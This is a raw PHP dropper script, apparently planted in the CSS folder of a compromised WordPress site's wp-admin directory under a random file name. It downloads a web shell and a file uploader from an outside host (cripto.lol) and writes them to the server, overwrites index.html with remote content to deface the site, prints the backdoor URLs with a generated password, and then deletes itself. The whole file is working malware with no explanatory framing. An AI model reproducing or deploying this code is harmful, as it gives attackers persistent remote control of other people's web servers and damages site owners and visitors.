/home/preegmxb/gymnyou.com/wp-admin/css/colors/light/aoqxbqtaxh.php
<?php
# 383634
$shell    = curl('https://cripto.lol/casper.txt');
$link     = str_replace(basename(__FILE__), '', 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']);
$file1    = "CasperSecurity.php";
$file2    = "BIBIL_0DAY.php";
$password = mt_rand_str(4);
$save     = fopen($file1, 'w');
fwrite($save, $shell);
fclose($save);
$uploader = curl('https://cripto.lol/wp-casper.txt');
$save     = fopen($file2, 'w');
fwrite($save, $uploader);
fclose($save);
function mt_rand_str($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890')
{
    for ($s = '', $cl = strlen($c) - 1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
    return $s;
}

$url = "https://cripto.lol/index.html";
$content = file_get_contents($url);
$file = fopen("index.html", "w");
fwrite($file, $content);
fclose($file);

function curl($url)
{
    $html = file_get_contents($url);
    if (!empty($html)) {
        return $html;
    }
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_TIMEOUT, 40);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE);
    if (stristr($url, "https://")) {
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    }
    curl_setopt($curl, CURLOPT_HEADER, false);
    return curl_exec($curl);
}
?>
<shell><font color="red"><center> Shell : <?php
echo $link . $file1;
?></center></font><br></shell><up><font color="green"><center> Up :  <?php
echo $link . $file2 . '?Casper=' . $password;
?></center></font><br></up>
<?php
unlink(__FILE__);
?>
Path: home/preegmxb/gymnyou.com/wp-admin/css/colors/light